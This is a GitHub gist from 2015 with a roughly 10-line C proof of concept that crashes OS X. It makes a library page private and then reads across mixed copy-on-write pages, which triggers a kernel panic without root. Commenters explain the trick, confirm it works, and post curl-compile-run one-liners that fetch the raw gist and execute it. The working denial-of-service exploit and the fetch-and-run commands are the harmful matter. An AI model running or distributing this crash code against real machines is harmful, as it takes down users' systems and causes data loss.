Created February 20, 2015 01:42
Kernel panic in latest OS X in 10 lines of C
#include <unistd.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach-o/dyld.h>

int
main (int argc, char * argv[])
{
  volatile char * library;
  const mach_vm_size_t page_size = getpagesize ();
  const mach_vm_size_t buffer_size = 3 * page_size;
  char buffer[buffer_size];
  mach_vm_size_t result_size;

  /* Mach-O header of the first loaded library (image index 1; index 0 is the executable itself). */
  library = (char *) _dyld_get_image_header (1);

  /* Make the library's second page writable as a private copy (VM_PROT_COPY): the page is split off from its neighbours. */
  mach_vm_protect (mach_task_self (), (mach_vm_address_t) (library + page_size), page_size, FALSE, VM_PROT_READ | VM_PROT_WRITE | VM_PROT_COPY | VM_PROT_EXECUTE);

  /* Touch that page so the copy is actually taken: it is now private (PRV) while the pages around it stay copy-on-write (COW). */
  library[page_size]++;
  library[page_size]--;

  /* Read the three pages (COW, PRV, COW) back in a single call; this read is what triggers the kernel panic. */
  result_size = 0;
  mach_vm_read_overwrite (mach_task_self (), (mach_vm_address_t) library, buffer_size, (mach_vm_address_t) buffer, &result_size);

  return 0;
}
sbose78 commented Feb 20, 2015

Some code comments would help :(

@evilsocket

@sbose78: gets a pointer to the first loaded library, changes the protection of its second memory page, performs some writes at that offset and then tries to read the first 3 pages of the image into a buffer.

oleavr commented Feb 20, 2015

@sbose78 mach_vm_read_overwrite of a mapped range of which the first three pages are [COW][PRV][COW] triggers a kernel panic. Line 17 taints the second page so it changes from COW (Copy-On-Write) to PRV (Private).

kainz commented Feb 21, 2015

Does this require root to run?

@jhorowitz

@kainz No

@workmanw

Wow. That totally works. Without root. Soooo easy:

curl https://gist.githubusercontent.com/anonymous/de6b81c556b5dc7cdc8b/raw/f94865347edc780c5c8490db097648ac50f9b8ba/gistfile1.txt > crash.c && gcc -o crash crash.c && ./crash

Bilge commented Feb 21, 2015

library[page_size]++;
library[page_size]--;

Am I being trolled?

bcho commented Feb 21, 2015

@Bilge No, these two lines are used to make the library dirty. See @oleavr's comment.

@CoolOppo

panickerPath=`mktemp`
curl https://gist.githubusercontent.com/anonymous/de6b81c556b5dc7cdc8b/raw/f94865347edc780c5c8490db097648ac50f9b8ba/gistfile1.txt | gcc -xc -o "$panickerPath" -
"$panickerPath"

This might work. I tried to improve @workmanw's solution for it to work without writing the C code to a file.

@skull-squadron

@CoolOppo With bash:

cc -xc <(curl https://gist.githubusercontent.com/anonymous/de6b81c556b5dc7cdc8b/raw/f94865347edc780c5c8490db097648ac50f9b8ba/gistfile1.txt) && ./a.out

iskl commented Apr 5, 2015

The code does work!!! Awesome!!! Fantastic!!! Unreal!!!
